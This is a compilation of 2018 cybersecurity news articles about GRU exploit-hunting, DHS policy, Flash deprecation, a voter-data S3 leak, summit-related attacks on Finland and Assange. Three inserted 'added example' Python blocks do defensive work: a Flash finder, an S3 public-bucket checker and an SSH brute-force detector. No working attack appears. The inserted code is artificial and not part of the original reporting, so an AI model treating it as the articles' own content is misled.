"I know that you can help," she wrote. "I'm working on a new project and I really need contacts that can provide information or have contacts with people who have new exploits. I am willing to pay for them."

In particular, Milton said she wanted information on a recently disclosed vulnerability tracked as CVE-2012-0002 - a critical flaw in Microsoft's Remote Desktop Protocol, patched in March 2012, that could allow attackers to remotely compromise Windows computers exposing the service. Milton had heard that someone had already cobbled together a working exploit.

"I'd like to get it," she said.

The researcher demurred. The trade in exploits — for use by spies, cops, surveillance companies or criminals — can be a seedy one.

"I usually steer clear from any wannabe buyers and sellers," she told the AP.

She politely declined - and never heard from Milton again.

Milton's Twitter account — whose profile photo features "Lost" star Evangeline Lilly — is long dormant. The last few messages carry urgent, awkwardly worded appeals for exploits or tips about vulnerabilities.

"Help me find detailed description CVE-2011-0978," one message reads, referring to a bug in PHP, a coding language often used for websites. "Need a work exploit," the message continues, ending with a smiley face.

It isn't clear whether Yermakov was working for the GRU when he first masqueraded as Kate S. Milton. Milton's Twitter silence — starting in 2011 — and the reference to a "new project" in 2012 might hint at a new job.

In any case, Yermakov wasn't working for the anti-virus firm Kaspersky — not then and not ever, the company said in a statement.

"We don't know why he allegedly presented himself as an employee," the statement said.

Messages sent by the AP to Kate S. Milton's Gmail account were not returned.

The exchanges between Milton (Yermakov) and the researcher could be read in different ways.

They might show that the GRU was trying to cultivate people in the information security community with an eye toward getting the latest exploits as soon as possible, said Cosimo Mortola, a threat intelligence analyst at the cybersecurity company FireEye.

It's also possible that Yermakov might have initially worked as an independent hacker, hustling for spy tools before being hired by Russian military intelligence — a theory that makes sense to defense and foreign policy analyst Pavel Felgenhauer.

"For cyber, you have to hire boys that understand computers and everything the old spies at the GRU don't understand," Felgenhauer said. "You find a good hacker, you recruit him and give him some training and a rank — a lieutenant or something — and then he will do the same stuff."

The leak of Milton's conversations shows how the glare of publicity is revealing elements of the hackers' methods — and perhaps even hints about their private lives.

It's possible, for example, that Yermakov and many of his colleagues commute to work through the arched entrance to Komsomolsky 22, a military base in the heart of Moscow that serves as home to the alleged hacker's Unit 26165. Photos shot from inside show it's a well-kept facility, with a czarist-era facade, manicured lawns, flower beds and shady trees in a central courtyard.

The AP and others have tried to trace the men's digital lives, finding references to some of those indicted by the FBI in academic papers on computing and mathematics, on Russian cybersecurity conference attendee lists or — in the case of Cpt. Nikolay Kozachek, nicknamed "kazak" — written into the malicious code created by Fancy Bear, the nickname long applied to the hacking squad before their identities were allegedly revealed by the FBI.

One of Kozachek's other nicknames also appears on a website that allowed users to mine tokens for new weapons to use in the first-person shooter videogame "Counter Strike: Global Offensive" — providing a flavor of the hackers' extracurricular interests.

The AP has also uncovered several social media profiles tied to another of Yermakov's indicted colleagues — Lt. Aleksey Lukashev, allegedly the man behind the successful phishing of the email account belonging to Hillary Clinton's campaign chairman, John Podesta.

Lukashev operated a Twitter account under the alias "Den Katenberg," according to an analysis of the indictment as well as data supplied by the cybersecurity firm Secureworks and Twitter's "Find My Friends" feature.

A tipster using the Russian facial recognition search engine FindFace recently pointed the AP to a VKontakte account that, while using a different name, appears active and features photos of the same young, Slavic-looking man.

Many of his posts and his friends appear to originate from a district outside Moscow known as Voskresensky. The photos show him cross-country skiing at night, wading in emerald waters somewhere warm and visiting Yaroslavl, an ancient city northwest of Moscow. One video appeared to show Russia's 2017 Spasskaya Tower Festival, a military music festival popular with officers.

The AP could not establish with certainty that the man on the VKontakte account is Lukashev. Several people listed as friends either declined to comment when approached by the AP or said Lukashev's name was unknown to them.

Shortly thereafter, the profile's owner locked down his account, making his vacation snaps invisible to outsiders.

The exchanges between the cybersecurity researcher and Kate S. Milton are available here.

DHS Unveils National Risk Management Center
1.8.18 securityweek   BigBrothers

Kirstjen Nielsen introduces National Risk Management Center

Secretary of Homeland Security Kirstjen Nielsen said on Tuesday that the U.S. Department of Homeland Security (DHS) has launched the National Risk Management Center, a joint center housed within DHS that will enable the private sector and government to collaborate and devise solutions to reduce risk to critical infrastructure.

Announced at the DHS National Cybersecurity Summit today in New York City, the new center will focus on three things:

● Identify, assess, and prioritize efforts to reduce risks to national critical functions, which enable national and economic security;

● Collaborate on the development of risk management strategies and approaches to manage risks to national functions; and

● Coordinate integrated cross-sector risk management activities.

According to the DHS, the center will lead a series of activities that will help “define what is truly critical; create the frameworks by which government and industry collectively manage risk; and initiate specific cross-sector activities to address known threats.”

Notable attendees and participants at the Summit include Vice President Mike Pence, Secretary of Energy Rick Perry, FBI Director Christopher Wray, and General Paul M. Nakasone, Commander of U.S. Cyber Command and Director of the National Security Agency.

A live stream of the event can be watched online throughout the day.

Senator Urges Federal Agencies to Ditch Adobe Flash
28.7.18 securityweek BigBrothers

United States Senator Ron Wyden on Wednesday sent a letter to three national agencies asking them to collaborate on ending government use of Adobe Flash.

Set to reach an end-of-life status in 2020, Adobe’s Flash Player is continually plagued by critical vulnerabilities. Two zero-days in the software were patched this year alone, but not before threat actors had exploited them in targeted attacks.

Immediately after Adobe announced plans to kill-off the plugin a year ago, Apple, Facebook, Google, Microsoft and Mozilla outlined plans to completely remove support for Flash from their products as well.

Sent to National Institute of Standards and Technology (NIST) Director Walter G. Copan, National Security Agency Director General Paul M. Nakasone, and Department of Homeland Security Secretary Kirstjen Nielsen, Senator Wyden’s letter (PDF) requests the end of government use of Flash by August 2019.

Senator Wyden cites not only the looming end of technical support for Flash, but also the plugin’s inherent security vulnerabilities as the main reasons to dispose of it.

“Flash is widely acknowledged by technical experts to be plagued by serious, largely unfixable cybersecurity issues that could allow attackers to completely take control of a visitor’s computer, reaching deep into their digital life,” the letter reads.

The United States Computer Emergency Readiness Team (US-CERT) warned about the risks of using Flash nearly a decade ago, the letter also notes.

“The U.S. government should begin transitioning away from Flash immediately, before it is abandoned in 2020,” Senator Wyden says. He also noted that the federal government has previously failed to transition from decommissioned software, as was the case with Windows XP, which cost millions for premium support after its end-of-life in 2014.

The three agencies, he says, provide the majority of cybersecurity guidance to government agencies, so they should ensure that federal workers are protected from cyber threats.

“To date, your agencies have yet to issue public guidance for the unavoidable transition away from Flash. A critical deadline is looming – the government must act to prevent the security risk posed by Flash from reaching catastrophic levels,” the letter reads.

The Senator asks NIST, NSA, and DHS to mandate that no new Flash-based content should be deployed on federal websites within 60 days and that all Flash-based content should be removed from the federal websites by August 1, 2019.

Flash should also be removed from the agencies’ employees’ computers by that date, Wyden said.
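Removing Flash from a site starts with an inventory of where it is embedded. The following Python is an added example, not part of the letter or of any agency guidance: it scans HTML for the usual Flash carriers (object tags carrying the Flash ActiveX CLSID or MIME type, embed and param references to .swf files, and swfobject loader scripts) and reports each one. The sample page and its paths are constructed for the example.

```python
"""Find Flash-based content in an HTML page (added example)."""
from html.parser import HTMLParser

FLASH_MIME = "application/x-shockwave-flash"
# CLSID of the Flash Player ActiveX control used by classic <object> embeds
FLASH_CLSID = "d27cdb6e-ae6d-11cf-96b8-444553540000"


def _is_swf(url):
    # Strip query string and fragment before checking the extension
    return url.lower().split("?")[0].split("#")[0].endswith(".swf")


class FlashFinder(HTMLParser):
    """Collects (tag, reference) pairs for every Flash carrier seen."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lowercases tag and attribute names
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":
            if (a.get("type", "").lower() == FLASH_MIME
                    or FLASH_CLSID in a.get("classid", "").lower()
                    or _is_swf(a.get("data", ""))):
                self.findings.append(("object", a.get("data") or a.get("classid") or a.get("type")))
        elif tag == "embed":
            if a.get("type", "").lower() == FLASH_MIME or _is_swf(a.get("src", "")):
                self.findings.append(("embed", a.get("src", "")))
        elif tag == "param":
            if a.get("name", "").lower() in ("movie", "src") and _is_swf(a.get("value", "")):
                self.findings.append(("param", a.get("value", "")))
        elif tag == "script":
            # swfobject.js is the common JavaScript loader for Flash movies
            if "swfobject" in a.get("src", "").lower():
                self.findings.append(("script", a.get("src", "")))


def find_flash(html):
    """Return a list of (tag, reference) for Flash content found in html."""
    parser = FlashFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: one classic object/param/embed block, a swfobject
# loader, and two non-Flash assets that must not be reported.
SAMPLE_HTML = """<html><body>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="400" height="300">
  <param name="movie" value="/media/intro.swf">
  <embed src="/media/intro.swf?v=3" type="application/x-shockwave-flash">
</object>
<script src="/js/swfobject.js"></script>
<img src="/img/logo.png">
<video src="/media/intro.mp4"></video>
</body></html>"""

if __name__ == "__main__":
    for tag, ref in find_flash(SAMPLE_HTML):
        print(f"{tag:7s} {ref}")
```

Run over crawled pages, this gives the list of pages and .swf assets that have to go before the deadline; a clean page returns an empty list. It only catches markup-level embeds, so Flash loaded through other script frameworks still needs a search of the JavaScript sources for .swf references.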

Cybersecurity, Compliance Slowing U.S. Government's Digital Transformation
24.7.18 securityweek BigBrothers

Complex Compliance Requirements are Delaying U.S. Government's Digital Transformation, Study Shows

With trust in the U.S. government at an all-time low (the Pew Research Center says that only 3% of Americans trust Washington to do the right thing 'just about always'), the suggestion is that a new 'moonshot moment' is necessary for government. A new report (PDF) says that moment is possible with digital transformation.

Success, however, is dependent on three requirements: federal agencies must create a culture of innovation; must prioritize the citizen experience; and must implement an integrated approach to digital transformation.

Consulting firm ICF employed Wakefield Research to survey 500 federal employees to understand the opportunities and obstacles for federal digital transformation. The prize, says ICF, is reigniting citizen trust and satisfaction in government, regardless of the administration. Cybersecurity and compliance issues are among the greatest of the obstacles, with user satisfaction an additional problem.

Eighty-nine percent of the respondents said that security and privacy requirements significantly delay technological innovation. More than half of the respondents admitted to experiencing a cybersecurity incident after implementing a new digital initiative, while almost half of those said that the incident delayed future innovation.

The federal IT procurement process is also an inhibitor, with 91% of respondents saying it needs to be completely overhauled. More than 30% go so far as to recognize benefits in using unauthorized technologies that have not been officially sanctioned by the IT department.

ICF believes that the combination of security/compliance concerns and strict procurement policy is inhibiting the creativity of federal agencies. "Creating a culture of innovation," says the report, "requires encouraging staff within agencies to think outside the box and empowering them to follow through on new ideas by providing targeted support."

Baris Yener, an SVP at ICF, told SecurityWeek, "Compliance has become an overly-complex aspect of security in the government. This is due primarily to the fact that the public sector thinks of security as an afterthought, something that is tacked on to existing processes, rather than building solutions with a security-first mindset. Compliance will remain a hindrance," he added, "until the government and its agencies embrace a shift in thinking that prioritizes an integrated approach to creating tools and services. Once that shift takes place, and stakeholders from across departments are brought together, compliance will be simpler."

In the meantime, he does not believe that empowering creativity will necessarily lead to an unacceptable expansion of shadow IT within federal agencies.

"By embracing outside-the-box thinking, and fostering a culture that encourages creativity," he said, "those staff members will instead raise their hand to offer new solutions, rather than turn to shadow IT. Creative thinking needs to be nurtured and rewarded. If there's anything we know about the nature of cybersecurity today, it's that the threat landscape is constantly changing. Feds with a different perspective will be critical to navigating uncharted territory."

Essential to the moonshot moment of digital transformation is user engagement with the outcome. Ninety-seven percent of the survey respondents say that government agencies now have a greater responsibility than ever to provide the digital tools and services that will make a positive difference in citizens' lives. But 80% also said that government is prioritizing perfecting the technology over the citizen experience.

The extent to which regulations shape new digital technology can be seen in the 44% of respondents who say compliance is the biggest priority when implementing a new digital technology, with 36% naming speed of implementation as the top priority. User adoption of that technology ranks second to last (30%), ahead only of the ability to measure its success (23%).

With such driving principles, ICF sees little chance of government maximizing the potential for engaging the trust of citizens. Federal staff accept the problem, with 92% suggesting that improving usability of the technology should be prioritized over technology development. "Instead of looking to the private sector primarily for technology solutions," suggests ICF, "federal leaders must implement user research and feedback loops that are designed to create and improve digital services."

This may seem a little surprising, since the issue of usability is understood and being tackled by new technologies in the private sector. The big development is the increasing use of artificial intelligence -- for example in reducing user friction in access control. However, Yener does not believe that such solutions can simply be transposed to the federal sector.

"For example," he told SecurityWeek, "when implementing new technologies like AI, the government needs to consider how to identify and document the standardization of those technologies, along with how it will be used within all agencies. Private sector by comparison has the freedom and flexibility to implement whatever would be beneficial to the business, with minimal standardization required or concern for other companies in their industry."

If project funding is available, the biggest obstacles to new digital developments are security concerns (41%), outdated policies (28%), skilled staff shortages (27%), complexity (22%), and lack of time (22%). Other obstacles include poor inter-office communication, difficulty in procuring services, and lack of support from senior management.

"To develop an integrated approach to digital transformation," says the report, "agencies should build a multidisciplinary team that executes technology implementation and prioritizes user adoption. Leaders need to ensure that every department -- including common omissions like HR -- is represented to better understand the needs of the entire organization as it works to apply digital transformation." Successful digital transformation, it adds, "will position the federal government to launch its next moonshot: digital transformation that reignites citizen trust and satisfaction in the government -- regardless of the administration."

EU Antitrust Officials Probe Thales, Gemalto Merger
24.7.18 securityweek  BigBrothers

The European Union said Monday it has launched an anti-trust investigation into the planned purchase by French aerospace and defence group Thales of SIM manufacturer Gemalto.

The European Commission, the 28-nation EU's executive arm, said it wants to determine whether the merger will increase prices as well as reduce choice and innovation for customers of hardware security modules (HSM).

An HSM is hardware that runs encryption software to "generate, protect, and manage encryption keys used to protect data in a secure, tamper-resistant module," it said.

"Our society is increasingly dependent on data security solutions to secure all sorts of social, commercial or personal information," the EU's competition commissioner Margrethe Vestager said in a statement.

"We are opening this in-depth investigation to ensure that the proposed transaction between Thales and Gemalto would not lead to higher prices or less choice in hardware security modules for customers looking to safely encrypt their data," Vestager added.

In a deal valued at about 4.8 billion euros, Thales agreed in December to buy Gemalto, based in the Netherlands, outbidding French competitor Atos.

With the merger, Thales is aiming to become a global leader in digital security.

The commission expressed concern that the merger would reduce players in the market.

Gemalto is active in mobile platforms and services, mobile embedded software and products, smart cards, identification documents, government programs, machine to machine communication, and enterprise security.

The Commission said it has until 29 November to take a decision.

Experts believe US Cyber Command is the only entity that can carry out ‘hack backs’
23.7.18 securityaffairs BigBrothers

The U.S. government should opt to carry out hack backs as retaliation against the massive attacks against organizations in the US private sector.
That is what three experts said at a panel organized by APCO: when appropriate, the military’s hacking unit should hit back.

The three experts, with backgrounds in the private sector, the intelligence community and the military, agreed that private organizations hit by cyber attacks should leave any response against the attackers to US Cyber Command.

“I think if it’s going to happen, it’s best in the hands of the government,” said Sean Weppner, chief strategy officer at NISOS Group and a former DOD cyber officer.

The experts pointed out that private companies lack both the intelligence capabilities to attribute an attack to a specific threat actor and the offensive capabilities to conduct hack backs.

Nor are private companies legally authorized to hack back, even where they have the capabilities.

“The U.S. government should decide how to retaliate against the worst attacks on the country’s private sector, and when appropriate, the military’s hacking unit should hit back, three experts said Monday.” reported CyberScoop.

“The controversial idea entails taking the fight to nefarious actors by attacking their computer network in-kind, probing for exfiltrated data and employing measures to retrieve or destroy stolen information.”

Alex Bolling, the former chief of operations at the CIA’s Information Operations Center, addressed the problem of cyber attacks against critical infrastructure, most of which is owned by private entities.

The response to attacks against critical infrastructure operated by private organizations must be delegated to the US Government.

In most cases, attacks against critical infrastructure come from persistent attackers, so a response requires specific cyber skills, and US CYBERCOM has them.

Speaking of the CYBERCOM Bolling said it is the “agency that is best resourced to respond to threats to [U.S.] national interests…[and] critical infrastructure in the energy, finance and wider commercial space,”


Private companies cannot carry out hack backs if we want to avoid a digital Wild West. A private company that decides to target its attackers is in any case a serious threat to the wider digital community.

“For one, companies venturing out into foreign networks would run the risk of disrupting existing U.S. intelligence or military operations.” continues CyberScoop.

According to Edward Amoroso, CEO of Tag Cyber, the US CYBERCOM should isolate the specific target to hit and attack it limiting the risk of any collateral damage.

“I’d like to think there’s a lot of human intelligence and spy-craft that provides a really good view” to the government, said Amoroso.

Experts also warn of the risk of hacking back a party that was not responsible, because of a wrong attribution of the attack.

Of course, every threat must be properly addressed, especially those that target the U.S. private sector daily. The three experts urge proper cyber hygiene to mitigate the risk of cyber attacks and limit the need to carry out hack backs.

Robocalling Firm Exposes U.S. Voter Records
22.7.18 securityweek BigBrothers

A publicly accessible Amazon Web Services S3 bucket belonging to a political autodial firm was exposing hundreds of thousands of United States voter records.

Discovered by Kromtech Security's Bob Diachenko, the misconfigured data repository is part of robocalling company Robocent’s cloud storage and had already been indexed by GrayhatWarfare, a searchable database of open S3 buckets that currently lists over 48,000 of them.

The Virginia Beach-based political autodial firm claims to have over 10 years of combined autodial experience and to be able to “reach thousands of voters instantly.”

“Our powerful dialer can make thousands of calls a minute, ensuring large calls always meet the deadline,” Robocent notes on its website.

The company’s publicly accessible storage held 2,594 listed files, including audio files with pre-recorded political messages for robocalls (*.mp3, *.wav).

More importantly, the Amazon S3 bucket contained a large amount of voter data (in the form of *.csv, *.xls files): full name, suffix, prefix; phone numbers (cell and landlines); address with house, street, city, state, zip, precinct; age and birth year; and gender.

Other voter information found in the cloud storage included affiliation provided by state, or inferred based on voting trends/history; jurisdiction breakdown based on district, zip code, precinct, county, state; and demographics based on ethnicity, language, and education, Diachenko reveals.

Many of the files in the S3 bucket were aggregated from outside data firms such as NationalBuilder.

In addition to making political robocalls starting at 1¢ per dial, Robocent also sells voter data at only 3¢ per record. The company also advertises on its website the data points it collects.

“We provide voter files for every need, whether it be for a new robocall or simply to update records for door knocking. Our simple request process allows users to choose exactly who to target with no minimum order,” Robocent says on its website.

According to Diachenko, the company quickly secured the S3 bucket and restricted access to the files after he responsibly alerted it to the issue.

“We're a small shop (I'm the only developer) so keeping track of everything can be tough,” Diachenko was told.

Over the past several years, there were numerous incidents involving voter databases, including one reported by Diachenko in December last year, where an improperly secured MongoDB database exposed the information of the entire voting population of California: it contained 19,264,123 records.
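The misconfiguration behind exposures like this one is the kind of check an owner of a bucket can automate. The following Python is an added example, not taken from Kromtech's or Robocent's material: it evaluates a bucket policy and an ACL document of the shape returned by the S3 GetBucketPolicy and GetBucketAcl APIs and flags grants that open the bucket to everyone (an anonymous principal with read or list actions in the policy, or the AllUsers and AuthenticatedUsers groups in the ACL). The policy, ACL, bucket name and account ID are constructed for the example; nothing is fetched from AWS.

```python
"""Flag bucket policies and ACL grants that make an S3 bucket world-readable (added example)."""
import json

PUBLIC_ACL_URIS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}
# Actions (lowercased) that let an anonymous caller list or download objects
READ_ACTIONS = {"s3:getobject", "s3:listbucket", "s3:*", "*", "s3:get*", "s3:list*"}


def _as_list(x):
    # Policy fields may be a single string or a list of strings
    return x if isinstance(x, list) else [x]


def _is_public_principal(principal):
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def public_policy_statements(policy):
    """Return (sid, exposed_actions, has_condition) for Allow statements open to everyone.

    A Condition element may narrow the grant, so it is reported rather than
    silently trusted."""
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not _is_public_principal(stmt.get("Principal")):
            continue
        actions = [a.lower() for a in _as_list(stmt.get("Action", []))]
        exposed = sorted(a for a in actions if a in READ_ACTIONS)
        if exposed:
            findings.append((stmt.get("Sid", "<no sid>"), exposed, "Condition" in stmt))
    return findings


def public_acl_grants(acl):
    """Return (group, permission) for ACL grants to the public or all-AWS-users groups."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_ACL_URIS:
            findings.append((PUBLIC_ACL_URIS[grantee["URI"]], grant.get("Permission")))
    return findings


# Constructed sample policy: one world-readable statement and one scoped to an
# application role (bucket name and account ID are placeholders).
SAMPLE_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": ["s3:GetObject", "s3:ListBucket"],
     "Resource": ["arn:aws:s3:::example-voter-files", "arn:aws:s3:::example-voter-files/*"]},
    {"Sid": "AppAccess", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::123456789012:role/app"},
     "Action": "s3:*", "Resource": "arn:aws:s3:::example-voter-files/*"}
  ]
}""")

# Constructed sample ACL: owner has full control, and the world has READ.
SAMPLE_ACL = {
    "Owner": {"ID": "owner-canonical-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
    ],
}

if __name__ == "__main__":
    for sid, actions, conditional in public_policy_statements(SAMPLE_POLICY):
        print(f"policy statement {sid}: public {actions}" + (" (has Condition)" if conditional else ""))
    for group, perm in public_acl_grants(SAMPLE_ACL):
        print(f"ACL grant: {group} has {perm}")
```

Either finding alone is enough to make the bucket listable by a crawler such as GrayhatWarfare. The durable fix is to remove the grant and turn on S3 Block Public Access, which refuses new public policies and ACLs regardless of what an individual developer later writes.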

Trump-Putin Meeting Puts Finland on Cyber-Attack Target List
22.7.18 securityweek BigBrothers

Historically, Finland has not been targeted by a high number of cyber-attacks, but digital assaults spiked in the days prior to the July 16 meeting between U.S. President Donald Trump and Russian President Vladimir Putin in Helsinki.

The massive rise in cyber-attacks isn’t surprising, given the precedent established earlier this year, when Singapore received a massive wave of attacks from June 11 to June 12, during the Trump-Kim summit.

While most of the cyber-attacks observed during President Trump’s meeting with the North Korean leader appeared to originate from Russia, those observed last week were mainly launched from China, F5 reports.

The Finland and Singapore attacks overlapped in the ports they targeted, which included SIP port 5060, typically used by VoIP phones (#3 in Finland attacks, #1 in Singapore attacks), SQL port 1433 (#6 in Finland, #3 in Singapore), and Telnet port 23 (#3 in Finland, #9 in Singapore).

The most attacked port in the new wave of assaults, however, was SSH port 22, followed by SMB port 445. SSH is often used for the secure remote administration of Internet of Things (IoT) devices, but vendors often protect these devices with easily guessable credentials, which turns them into easy targets for cybercriminals.

“The device credentials are typically vendor defaults and, as such, are routinely brute forced. The majority of the attacks against Finland surrounding the Trump-Putin meeting were brute force attacks,” F5 notes.

The Finland assaults also targeted ports that weren’t seen in the Singapore attacks, including HTTP port 80, MySQL port 3306, the alternate web server port 8090, often used for web cameras, and RDP port 3389.

Despite the massive spike in cyber-attacks targeting Finland between July 12 and July 15, the country remained far behind the top targeted countries. Compared to Canada, which typically makes the top 10 but not the top 5, Finland received only a small fraction of the attacks on July 12 and July 14 and “doesn’t even register on the chart,” F5 says.

The top targeting countries during the spike were China (29%), United States (14%) and France (9%), followed by Italy (8%) and Russia (7%). Many of the attacks originated from networks usually seen launching such attacks, the security researchers say.

ChinaNet, consistently at the top of the threat actor network list globally, remained the top attacking network during the attack spike.

Such attacks, F5 notes, are possible because of the rise of poorly secured IoT devices. By targeting vulnerable devices, nation-states, spies, mercenaries, and others can easily launch attacks against anyone.

“If threat actors can follow anyone from an average citizen to a CIA agent, why not President Trump, or any member of his official entourage? They are perhaps the highest valued intelligence targets on the planet right now. Even allied state actors have an interest in gaining eyes or ears into any member of the Trump entourage,” F5 notes.

Trump-Putin Meeting was the root cause of a spike of cyber attacks against Finland
22.7.18 securityaffairs  BigBrothers

F5 experts observed a spike in attacks in the days prior to the Trump-Putin meeting held in Helsinki, Finland, on July 16.
Important events attract cyber attacks: in June we discussed the Trump-Kim summit and how Singapore, which hosted it, was hit by an unprecedented number of attacks from June 11 to June 12.

At the time, most of the cyber attacks originated in Russia.

Let’s analyze the effect in cyberspace of another event, the Trump-Putin meeting held in Helsinki, Finland, a country that historically has not been a favoured target of hackers.

The experts pointed out that they have no data to suggest the attacks against Finland were successful.

Once again, researchers at security firm F5 analyzed the attacks that hit the host location during the summit and made an interesting discovery: most of the cyber attacks originated in China.

“On July 16th, President Trump met with Vladimir Putin in Helsinki, Finland. As expected, attacks against Finland skyrocketed days before the meeting. What’s interesting this time around is that Russia wasn’t the top attacker—perhaps because Trump was meeting with Putin? In this case, China was the top attacker.” reports the security firm F5.

Experts observed many similarities between the attacks against the countries that hosted the two meetings. Hackers targeted the same ports, including SIP port 5060, typically used by VoIP systems (#3 in Finland attacks, #1 in Singapore attacks), SQL port 1433 (#6 in Finland, #3 in Singapore), and Telnet port 23 (#3 in Finland, #9 in Singapore).

Most of the attacks targeted SSH port 22, which is typically used for the secure remote administration of Internet of Things (IoT) devices. Attackers scan for devices configured with default credentials and compromise them with brute force attacks.

The second most targeted port was the SMB port 445.

“The challenge is that the device credentials are typically vendor defaults and, as such, are routinely brute forced. The majority of the attacks against Finland surrounding the Trump-Putin meeting were brute force attacks,” continues F5.
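Detection logic for the SSH default-credential brute forcing that both the securityweek and securityaffairs write-ups above describe, as an added example that is not part of F5's report or of either article; the sshd log lines, the host name, the TEST-NET source addresses, and the threshold of five failures per minute are all constructed for the example.

```python
"""Flag SSH password brute-forcing in sshd auth log lines.

Added example, not part of the F5 report or of either article: it counts
"Failed password" events per source address inside a sliding time window
and reports sources that exceed a threshold, which is what the
default-credential guessing on port 22 described above looks like on a
target host.  The log lines, host name, threshold and window are all
constructed for this example.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# OpenSSH "Failed password" lines as written by syslog (RFC 3164 timestamps,
# which carry no year, so the caller supplies one).
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)

# Constructed sample: one source (TEST-NET address 203.0.113.7) hammers
# default account names within seconds; an operator from 198.51.100.5
# mistypes a password twice, far apart, then logs in with a key.
SAMPLE_LOG = """\
Jul 13 02:14:01 iot-gw sshd[1201]: Failed password for root from 203.0.113.7 port 51022 ssh2
Jul 13 02:14:03 iot-gw sshd[1201]: Failed password for root from 203.0.113.7 port 51022 ssh2
Jul 13 02:14:06 iot-gw sshd[1203]: Failed password for invalid user admin from 203.0.113.7 port 51030 ssh2
Jul 13 02:14:09 iot-gw sshd[1203]: Failed password for invalid user admin from 203.0.113.7 port 51030 ssh2
Jul 13 02:14:12 iot-gw sshd[1205]: Failed password for invalid user pi from 203.0.113.7 port 51041 ssh2
Jul 13 02:14:15 iot-gw sshd[1207]: Failed password for invalid user guest from 203.0.113.7 port 51055 ssh2
Jul 13 02:14:20 iot-gw sshd[1207]: Failed password for invalid user guest from 203.0.113.7 port 51055 ssh2
Jul 13 02:14:24 iot-gw sshd[1211]: Failed password for root from 203.0.113.7 port 51071 ssh2
Jul 13 02:30:10 iot-gw sshd[1300]: Failed password for ops from 198.51.100.5 port 40022 ssh2
Jul 13 02:30:31 iot-gw sshd[1300]: Accepted publickey for ops from 198.51.100.5 port 40022 ssh2
Jul 13 03:05:44 iot-gw sshd[1350]: Failed password for ops from 198.51.100.5 port 40100 ssh2
"""


def parse_failed_login(line, year=2018):
    """Return (timestamp, user, ip) for a failed-password line, else None."""
    m = FAILED_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["user"], m["ip"]


def detect_brute_force(lines, threshold=5, window_seconds=60, year=2018):
    """Return {ip: (total_failures, sorted usernames tried)} for each source
    that produced more than `threshold` failures inside any `window_seconds`
    span.  One deque per IP keeps only the timestamps still in the window."""
    windows = defaultdict(deque)
    users = defaultdict(set)
    totals = defaultdict(int)
    flagged = set()
    for line in lines:
        parsed = parse_failed_login(line, year)
        if parsed is None:
            continue  # accepted logins and unrelated lines are skipped
        ts, user, ip = parsed
        q = windows[ip]
        q.append(ts)
        users[ip].add(user)
        totals[ip] += 1
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()  # expire attempts older than the window
        if len(q) > threshold:
            flagged.add(ip)
    return {ip: (totals[ip], sorted(users[ip])) for ip in flagged}


def analyze_sample():
    """Run the detector over the constructed sample log."""
    return detect_brute_force(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for ip, (count, names) in analyze_sample().items():
        print(f"{ip}: {count} failed logins, usernames tried: {', '.join(names)}")
```

Only the source that guesses default account names faster than the window allows is reported; the operator's two isolated typos stay below the threshold.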

Experts noticed that some ports targeted by the attacks during the Trump-Putin meeting were not hit during the Singapore summit, for example, the HTTP port 80, MySQL port 3306, the alternate web server port 8090, often used for web cameras, and RDP port 3389.

Experts highlighted that Finland is not included in the list of top-targeted countries.

Which were the other top targeting countries during the Helsinki meeting?

The top targeting countries were:

China (29%);
United States (14%);
France (9%);
Italy (8%);
Russia (7%).

According to F5, ChinaNet was the top attacking network during the attack spike.

“If threat actors can follow anyone from an average citizen to a CIA agent, why not President Trump, or any member of his official entourage? They are perhaps the highest valued intelligence targets on the planet right now. Even allied state actors have an interest in gaining eyes or ears into any member of the Trump entourage,” F5 concludes.

Ecuador to withdraw asylum for Julian Assange in coming weeks or days
22.7.18 securityaffairs  BigBrothers

According to media, Ecuador is going to hand over the WikiLeaks founder Julian Assange to the UK in “coming weeks or even days.”
In 2012 a British judge ruled that WikiLeaks founder Julian Assange should be extradited to Sweden to face allegations of sexual assault there, but Assange received political asylum from Ecuador and has spent the years since in its London embassy.

Now Ecuador is planning to withdraw its political asylum, likely next week, which means that Assange will have to leave the embassy and British authorities will arrest him.

“Sources close to Assange said he himself was not aware of the talks but believed that America was putting ‘significant pressure’ on Ecuador, including threatening to block a loan from the International Monetary Fund (IMF) if he continues to stay at the embassy,” reported RT.

The newly elected President of Ecuador, Lenín Moreno, arrived in London on Friday; officially, the purpose of his trip is to take part in the Global Disability Summit on 24 July 2018, but media reports suggest he was reaching an agreement with the UK government to withdraw Assange's asylum protection.

